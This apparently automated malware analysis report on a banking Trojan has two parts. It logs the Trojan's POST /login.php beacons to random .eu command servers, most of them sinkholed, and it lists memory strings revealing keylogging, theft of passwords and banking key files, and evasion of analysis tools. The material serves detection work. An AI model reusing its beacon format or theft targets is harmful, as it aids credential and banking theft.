Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Fri, 02 Sep 2016 17:50:46 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.4.6 (Ubuntu)</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Fri, 02 Sep 2016 17:50:46 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.4.6 (Ubuntu)</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jefapexytar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:05 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:57 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
Explorer.EXE_532_rwx_02250000_000B2000:
.text
`.data
.reloc
`.rdata
@.data
http
PASSu98V
PASSu08V
FTPQ
12345678
password1
monkey
monkey1
password
Pname.key
\secrets.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
sysinfo.log
scr.jpg
minidump.bin
%d.%d.%d.%d
à %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.8.14
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
Winmm.dll
Kernel32.dll
Gdi32.dll
ntdll.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
\firefox.exe
keygrab
u.jpg
IprivLibEx.dll
\\.\PhysicalDrive%u
/topic.php
keylog.txt
sniff.log
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\opera.exe
\cbmain.ex
\iscc.exe
\clmain.exe
\wclnt.exe
internal_wutex_0xx
%s.dbf
%s.DBF
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
AUTHINFO PASS
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
ssleay32.dll
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
#webcam
#webcam
#webcam%d
#webcam%d
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetKeyboardLayoutList
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanW
VkKeyScanW
VkKeyScanExW
VkKeyScanExW
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
AVICAP32.dll
AVICAP32.dll
MSVFW32.dll
MSVFW32.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
Windows Explorer
mavast.com
ya.ru
serverkey.dat
\windows\
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
.Prev
.current
Explorer.EXE_532_rwx_02AF0000_000B8000:
.text
`.rdata
@.data
.reloc
http
PASSu98V
PASSu08V
FTPQ
12345678
password1
monkey
monkey1
password
Pname.key
\secrets.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
sysinfo.log
scr.jpg
minidump.bin
%d.%d.%d.%d
à %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.8.14
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
Winmm.dll
Kernel32.dll
Gdi32.dll
ntdll.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
\firefox.exe
keygrab
u.jpg
IprivLibEx.dll
\\.\PhysicalDrive%u
/topic.php
keylog.txt
sniff.log
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\opera.exe
\cbmain.ex
\iscc.exe
\clmain.exe
\wclnt.exe
internal_wutex_0xx
